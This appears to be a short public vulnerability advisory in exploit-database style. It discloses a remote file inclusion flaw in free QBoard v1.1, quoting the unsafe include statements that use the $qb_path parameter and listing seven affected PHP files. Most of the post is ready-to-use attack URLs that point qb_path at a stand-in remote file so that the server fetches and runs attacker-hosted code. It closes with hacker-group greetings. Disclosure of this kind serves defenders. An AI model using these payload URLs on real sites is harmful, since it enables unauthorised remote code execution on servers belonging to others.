free QBoard v1.1 Multiple Remote File include
-------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
Arabian Security Team
-------------------------------------------------
site of script:http://sourceforge.net/projects/freeqboard/
-------------------------------------------------
Vulnerable: free QBoard v1.1
-------------------------------------------------
vulnerable code:
----------------------
1- in index.php
include $qb_path."incs/mysql.php";
include $qb_path."incs/crypt.php";
----------------------------------
2- in about.php
include $qb_path."incs/header.php";
----------------------------------
3- in contact.php
include $qb_path."incs/header.php";
----------------------------------
4- in delete.php
include $qb_path."incs/mysql.php";
include $qb_path."incs/crypt.php";
----------------------------------
5- in faq.php
include $qb_path."incs/header.php";
----------------------------------
6- in features.php
include $qb_path."incs/header.php";
----------------------------------
7- in history.php
include $qb_path."incs/mysql.php";
include $qb_path."incs/crypt.php";
----------
$qb_path parameter File inclusion
------------------------------------------------------------------------
-----------------------------------------------------------------
vulnerable files :
--------------------
index.php
about.php
contact.php
delete.php
faq.php
features.php
history.php
-------------------------------------------------
example:
www.example.com/(path)/index.php?qb_path=http://evilcode.txt?
www.example.com/(path)/about.php?qb_path=http://evilcode.txt?
www.example.com/(path)/contact.php?qb_path=http://evilcode.txt?
www.example.com/(path)/delete.php?qb_path=http://evilcode.txt?
www.example.com/(path)/faq.php?qb_path=http://evilcode.txt?
www.example.com/(path)/features.php?qb_path=http://evilcode.txt?
www.example.com/(path)/history.php?qb_path=http://evilcode.txt?
-------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
E-mail:KARKOR23 (at) hotmail (dot) com [email concealed]
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALM
OKAN3, mr-hcr AND ALL LEZR.COM Member
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum